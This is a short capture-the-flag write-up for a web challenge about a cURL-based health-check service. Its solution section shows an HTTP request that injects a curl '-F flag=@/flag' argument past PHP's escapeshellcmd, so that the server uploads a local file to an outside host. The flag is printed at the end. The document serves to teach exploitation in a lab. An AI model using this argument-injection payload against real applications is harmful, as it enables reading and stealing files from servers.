# Health Checker v0.1

## CHALLENGE INFO

We've built the most secure cURL-based post-deploy healthcheck tool in the market, come and check it out!

## Challange download and instructions

[web_health_check](web_health_check.zip)

To run challange you need some linux with docker

- unzip file
- run ./build-docker.sh

## Solve

<details>
<summary>Click this to collapse/fold.</summary>

Curl argument injection because PHP `escapeshellcmd` allows inject arguments

```
POST /api/curl HTTP/1.1
Host: 157.245.32.65:31196
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://157.245.32.65:31196/
Content-Type: application/x-www-form-urlencoded

host=https%3A%2F%2Fwww.shadowcode.ninja%2Fctf%2Fctf.php%20-F%20flag%3D%40%2Fflag
```

</details>

## Flag

HTB{curl_pwn4g3_3n_r0ut3!}
